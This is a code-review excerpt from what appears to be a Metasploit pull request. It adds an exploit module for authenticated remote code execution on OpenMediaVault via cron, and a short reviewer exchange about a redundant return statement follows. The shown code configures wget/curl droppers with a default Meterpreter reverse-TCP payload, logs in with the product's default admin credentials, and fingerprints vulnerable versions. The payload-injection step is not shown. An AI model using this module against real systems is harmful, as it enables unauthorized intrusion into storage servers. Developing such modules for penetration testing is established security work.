modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,323 @@
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80,
+          'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']),
+        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
+      ]
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def login(user, pass, _opts = {})
+    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'data' => {
+        service: 'Session',
+        method: 'login',
+        params: {
+          username: user.to_s,
+          password: pass.to_s
+        },
+        options: nil
+      }.to_json
+    })
+    return true if res && res.code == 200 && res.body.include?('"authenticated":true')
+
+    false
+  end
+
+  def check_version
+    print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'data' => {
+        service: 'System',
+        method: 'getInformation',
+        params: nil,
+        options: {
+          updatelastaccess: false
+        }
+      }.to_json
+    })
+    return nil unless res && res.code == 200 && res.body.include?('"error":null')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    unless res_json.blank?
+      # OpenMediaVault v4 has a different json format where index 1 has the version information
+      version = res_json.dig('response', 1, 'value')
+      version = res_json.dig('response', 'version') if version.nil?
+      return version.split('(')[0].gsub(/[[:space:]]/, '') unless version.nil?
+    end
+    nil
+  end
+
+  def apply_config_changes
+    # Apply OpenMediaVault configuration changes
+    return send_request_cgi({
```

Comment:
Not a big deal, I believe `return` is not needed here.
```suggestion
    send_request_cgi({
```

Reply:
Mmm, I am testing the response. Are you sure?
```
res = apply_config_changes
if res && res.code == 200 && res.body.include?('"error":null')
```